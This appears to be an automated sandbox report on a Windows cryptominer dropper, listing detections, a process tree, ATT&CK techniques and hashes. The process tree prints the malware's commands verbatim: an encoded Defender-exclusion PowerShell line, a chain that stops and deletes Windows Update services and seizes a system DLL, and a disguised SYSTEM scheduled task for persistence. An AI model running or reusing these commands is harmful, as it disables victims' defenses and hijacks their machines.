Analysis

  • max time kernel
    300s
  • max time network
    252s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    27-06-2022 22:15

General

  • Target

    e368dd29cf385103ed8df8ef9ff221be7c0f81ac56efffdad485bb141bbb9dec.exe

  • Size

    7.4MB

  • MD5

    34719a80e9cca827371d5f1e44f10168

  • SHA1

    3ea872bd581ce47505a312d74f6b0e897202d021

  • SHA256

    e368dd29cf385103ed8df8ef9ff221be7c0f81ac56efffdad485bb141bbb9dec

  • SHA512

    2f96ffcb8a45d7dcb525c952e63cdd466ed60eb6bc624756f4c9d815ea40c2fe14da9e4905f7494db24d02c83354b8759adf677ea3c75b986626a376b0a53acf

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • XMRig Miner Payload 13 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Themida packer 14 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 46 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e368dd29cf385103ed8df8ef9ff221be7c0f81ac56efffdad485bb141bbb9dec.exe
    "C:\Users\Admin\AppData\Local\Temp\e368dd29cf385103ed8df8ef9ff221be7c0f81ac56efffdad485bb141bbb9dec.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1992
    • C:\Windows\Temp\setup.exe
      "C:\Windows\Temp\setup.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of WriteProcessMemory
      PID:1720
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
        3⤵
        • Drops file in Drivers directory
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1540
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHUAbAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAbABlACMAPgA="
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:872
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -EncodedCommand "PAAjAHUAbAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAbABlACMAPgA="
            5⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1632
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1592
          • C:\Windows\system32\sc.exe
            sc stop UsoSvc
            5⤵
            • Launches sc.exe
            PID:572
          • C:\Windows\system32\sc.exe
            sc stop WaaSMedicSvc
            5⤵
            • Launches sc.exe
            PID:1560
          • C:\Windows\system32\sc.exe
            sc stop wuauserv
            5⤵
            • Launches sc.exe
            PID:1996
          • C:\Windows\system32\sc.exe
            sc stop bits
            5⤵
            • Launches sc.exe
            PID:1132
          • C:\Windows\system32\sc.exe
            sc stop dosvc
            5⤵
            • Launches sc.exe
            PID:1776
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
            5⤵
            • Modifies registry key
            PID:1736
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
            5⤵
            • Modifies registry key
            PID:1684
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
            5⤵
            • Modifies security service
            • Modifies registry key
            PID:1928
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
            5⤵
            • Modifies registry key
            PID:1692
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
            5⤵
            • Modifies registry key
            PID:1544
          • C:\Windows\system32\takeown.exe
            takeown /f C:\Windows\System32\WaaSMedicSvc.dll
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:2044
          • C:\Windows\system32\icacls.exe
            icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:1132
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1936
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1744
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1960
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:268
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
            5⤵
              PID:1068
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
              5⤵
                PID:1552
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                5⤵
                  PID:1544
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                  5⤵
                    PID:2044
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                    5⤵
                      PID:1736
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                      5⤵
                        PID:1088
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                        5⤵
                          PID:988
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1768
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1212
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-dc 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1420
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1744
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-dc 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:268
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'
                        4⤵
                          PID:300
                          • C:\Windows\system32\schtasks.exe
                            schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'
                            5⤵
                            • Creates scheduled task(s)
                            PID:1088
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                          4⤵
                            PID:476
                            • C:\Windows\system32\schtasks.exe
                              schtasks /run /tn "GoogleUpdateTaskMachineQC"
                              5⤵
                                PID:268
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c ""C:\Windows\Temp\run.bat" "
                          2⤵
                          • Drops startup file
                          PID:528
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c ""C:\Windows\Temp\lol.bat" "
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:672
                          • C:\Program Files\Internet Explorer\iexplore.exe
                            "C:\Program Files\Internet Explorer\iexplore.exe" https://take-realprize.life/?u=lq1pd08&o=hdck0gl
                            3⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SetWindowsHookEx
                            • Suspicious use of WriteProcessMemory
                            PID:972
                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:972 CREDAT:275457 /prefetch:2
                              4⤵
                              • Modifies Internet Explorer settings
                              • Suspicious use of SetWindowsHookEx
                              PID:984
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {467EAA5F-53AC-4B93-82C5-BBFF580762B8} S-1-5-18:NT AUTHORITY\System:Service:
                        1⤵
                        • Loads dropped DLL
                        PID:1068
                        • C:\Program Files\Chrome\updater.exe
                          "C:\Program Files\Chrome\updater.exe"
                          2⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Executes dropped EXE
                          • Checks BIOS information in registry
                          • Checks whether UAC is enabled
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          PID:1544
                          • C:\Windows\System32\conhost.exe
                            "C:\Windows\System32\conhost.exe" "C:\Program Files\Chrome\updater.exe"
                            3⤵
                            • Drops file in Drivers directory
                            • Suspicious use of SetThreadContext
                            • Drops file in Program Files directory
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:896
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHUAbAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAbABlACMAPgA="
                              4⤵
                                PID:1964
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -EncodedCommand "PAAjAHUAbAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAbABlACMAPgA="
                                  5⤵
                                  • Drops file in System32 directory
                                  • Modifies data under HKEY_USERS
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:800
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                4⤵
                                  PID:888
                                  • C:\Windows\system32\sc.exe
                                    sc stop UsoSvc
                                    5⤵
                                    • Launches sc.exe
                                    PID:300
                                  • C:\Windows\system32\sc.exe
                                    sc stop WaaSMedicSvc
                                    5⤵
                                    • Launches sc.exe
                                    PID:1112
                                  • C:\Windows\system32\sc.exe
                                    sc stop wuauserv
                                    5⤵
                                    • Launches sc.exe
                                    PID:476
                                  • C:\Windows\system32\sc.exe
                                    sc stop bits
                                    5⤵
                                    • Launches sc.exe
                                    PID:1680
                                  • C:\Windows\system32\sc.exe
                                    sc stop dosvc
                                    5⤵
                                    • Launches sc.exe
                                    PID:1612
                                  • C:\Windows\system32\reg.exe
                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                    5⤵
                                    • Modifies registry key
                                    PID:1988
                                  • C:\Windows\system32\reg.exe
                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                    5⤵
                                    • Modifies registry key
                                    PID:952
                                  • C:\Windows\system32\reg.exe
                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                    5⤵
                                    • Modifies registry key
                                    PID:300
                                  • C:\Windows\system32\reg.exe
                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                    5⤵
                                    • Modifies registry key
                                    PID:428
                                  • C:\Windows\system32\reg.exe
                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                    5⤵
                                    • Modifies registry key
                                    PID:1768
                                  • C:\Windows\system32\takeown.exe
                                    takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                    5⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1260
                                  • C:\Windows\system32\icacls.exe
                                    icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                    5⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    PID:1684
                                  • C:\Windows\system32\reg.exe
                                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                    5⤵
                                    • Modifies registry key
                                    PID:1088
                                  • C:\Windows\system32\reg.exe
                                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                    5⤵
                                    • Modifies registry key
                                    PID:976
                                  • C:\Windows\system32\reg.exe
                                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                    5⤵
                                    • Modifies registry key
                                    PID:1708
                                  • C:\Windows\system32\reg.exe
                                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                    5⤵
                                    • Modifies registry key
                                    PID:1888
                                  • C:\Windows\system32\schtasks.exe
                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                    5⤵
                                      PID:1712
                                    • C:\Windows\system32\schtasks.exe
                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                      5⤵
                                        PID:1960
                                      • C:\Windows\system32\schtasks.exe
                                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                        5⤵
                                          PID:300
                                        • C:\Windows\system32\schtasks.exe
                                          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                          5⤵
                                            PID:2044
                                          • C:\Windows\system32\schtasks.exe
                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                            5⤵
                                              PID:568
                                            • C:\Windows\system32\schtasks.exe
                                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                              5⤵
                                                PID:1480
                                              • C:\Windows\system32\schtasks.exe
                                                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                5⤵
                                                  PID:1104
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                4⤵
                                                  PID:1344
                                                  • C:\Windows\system32\powercfg.exe
                                                    powercfg /x -hibernate-timeout-ac 0
                                                    5⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1768
                                                  • C:\Windows\system32\powercfg.exe
                                                    powercfg /x -hibernate-timeout-dc 0
                                                    5⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1780
                                                  • C:\Windows\system32\powercfg.exe
                                                    powercfg /x -standby-timeout-ac 0
                                                    5⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1964
                                                  • C:\Windows\system32\powercfg.exe
                                                    powercfg /x -standby-timeout-dc 0
                                                    5⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:572
                                                • C:\Windows\System32\conhost.exe
                                                  C:\Windows\System32\conhost.exe
                                                  4⤵
                                                    PID:1776
                                                    • C:\Windows\System32\conhost.exe
                                                      "C:\Windows\System32\conhost.exe" "ojfwdlyws"
                                                      5⤵
                                                        PID:1712
                                                    • C:\Windows\explorer.exe
                                                      C:\Windows\explorer.exe lvsbssvxocugcs1 aL9rWj13blqq3tQ6pq9BT64AEBTmmOZm2QnBzGRIrKyPM+h6GrlnTiw+84eQ+CjWwBvkP87y7fXUxvpWV+HOpwb4PFo0jfTYPIt8JLgpwB1l8+CPbjc8h5MGxwyuTAey5biMSNMXOCtrSwCAFGci43+J3ydPNcojjZuAczbPZ1dBIQ5NqMMQgtC0jINPHoADVgFiGvBTZc3nZKTrcuq8D5Q6HIf/EjJVDZjRZCe1iTbxWAKxZYSidMYzSzljVILede0zBXD0QgA8LeNhccfrjoe1LDMwWWGAFofnDuXZvQ3zrdnSD+cO2tUeQFc0Iw9P0SaQPBUTVX71xc7K3LubObahCWMZVHkFICc50uU8YhqdqKLvSuv0ElS+058KBhG7RyHoxTloFDhNM+dRe4uyDTloLV41p4EJnfF4X9pUtMZNFP5RMoJ0pPwpeeM2damF
                                                      4⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:952

                                              Network

                                              MITRE ATT&CK Matrix ATT&CK v6

                                              Execution

                                              Scheduled Task

                                              1
                                              T1053

                                              Persistence

                                              Modify Existing Service

                                              2
                                              T1031

                                              Scheduled Task

                                              1
                                              T1053

                                              Privilege Escalation

                                              Scheduled Task

                                              1
                                              T1053

                                              Defense Evasion

                                              Modify Registry

                                              3
                                              T1112

                                              Virtualization/Sandbox Evasion

                                              1
                                              T1497

                                              Impair Defenses

                                              1
                                              T1562

                                              File Permissions Modification

                                              1
                                              T1222

                                              Discovery

                                              Query Registry

                                              2
                                              T1012

                                              Virtualization/Sandbox Evasion

                                              1
                                              T1497

                                              System Information Discovery

                                              3
                                              T1082

                                              Impact

                                              Service Stop

                                              1
                                              T1489

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\Program Files\Chrome\updater.exe
                                                Filesize

                                                7.1MB

                                                MD5

                                                e85216c5e3420493ea698778ccf16073

                                                SHA1

                                                ae034212c790f7181ea92426a5dcc08cafd0b711

                                                SHA256

                                                d007ef5a94993c5e069e8e41e324e811146d956b15db0e04916798b84a7cd28d

                                                SHA512

                                                8b9356da7d6ec043c94a6542c324ca7c9861038c2015ab051e1c3dfd25dc3a4cbd8684f396b66577c7d6ae89e09bc98df6fc82a2796f3c56658f5f321ccb3f45

                                              • C:\Program Files\Chrome\updater.exe
                                                Filesize

                                                7.1MB

                                                MD5

                                                e85216c5e3420493ea698778ccf16073

                                                SHA1

                                                ae034212c790f7181ea92426a5dcc08cafd0b711

                                                SHA256

                                                d007ef5a94993c5e069e8e41e324e811146d956b15db0e04916798b84a7cd28d

                                                SHA512

                                                8b9356da7d6ec043c94a6542c324ca7c9861038c2015ab051e1c3dfd25dc3a4cbd8684f396b66577c7d6ae89e09bc98df6fc82a2796f3c56658f5f321ccb3f45

                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                                                Filesize

                                                60KB

                                                MD5

                                                308336e7f515478969b24c13ded11ede

                                                SHA1

                                                8fb0cf42b77dbbef224a1e5fc38abc2486320775

                                                SHA256

                                                889b832323726a9f10ad03f85562048fdcfe20c9ff6f9d37412cf477b4e92ff9

                                                SHA512

                                                61ad97228cd6c3909ef3ac5e4940199971f293bdd0d5eb7916e60469573a44b6287c0fa1e0b6c1389df35eb6c9a7d2a61fdb318d4a886a3821ef5a9dab3ac24f

                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                Filesize

                                                342B

                                                MD5

                                                6ce19da4b77f2871e73ca4aa0e5c144e

                                                SHA1

                                                46228ef06ab74fedd41ff4ce879774eb92e54faf

                                                SHA256

                                                996b5eb3645c344df3d081ac01c20e2d5e736bd33d4747e8f5666b7d8c582514

                                                SHA512

                                                24c78f6509b084cd74ed1e89f54ccbec8c9aa6cec0f7494486c5ef9cd01f06c692bf320b1d062c0087bb390de796dc44cd6a7bfc22d49558905d451a90232fe3

                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\6SBUY7FD.txt
                                                Filesize

                                                602B

                                                MD5

                                                93b29ef3f86f46beb107a1687df854ad

                                                SHA1

                                                197683146715332730921ad0d7140eaeb19a6048

                                                SHA256

                                                a5c1fa093fdf93ae672e914cbd7efb2579c5e59526156de8e9147dd1e17a5e54

                                                SHA512

                                                d5d87f5bc39a4cb5de34b33d5d81b2fb288f0f1c20a9a37fb7a628e53d3f8a266082923040218041d4f2131e796005669b8a0e5a2fd5fb73143bde4c5c52ffda

                                              • C:\Windows\Temp\lol.bat
                                                Filesize

                                                59B

                                                MD5

                                                f580e0e80cc87b25e38ea2c0c8059d04

                                                SHA1

                                                299f51dca9c609d6da86f93c424e39c1e6ba0d94

                                                SHA256

                                                9e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734

                                                SHA512

                                                5a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d

                                              • C:\Windows\Temp\run.bat
                                                Filesize

                                                98B

                                                MD5

                                                731afe244b2414169a5f630d52646e56

                                                SHA1

                                                e3771ccdccd8c306ee5fc4f264cfc3310690458c

                                                SHA256

                                                6c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552

                                                SHA512

                                                84e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1

                                              • C:\Windows\Temp\setup.exe
                                                Filesize

                                                7.1MB

                                                MD5

                                                e85216c5e3420493ea698778ccf16073

                                                SHA1

                                                ae034212c790f7181ea92426a5dcc08cafd0b711

                                                SHA256

                                                d007ef5a94993c5e069e8e41e324e811146d956b15db0e04916798b84a7cd28d

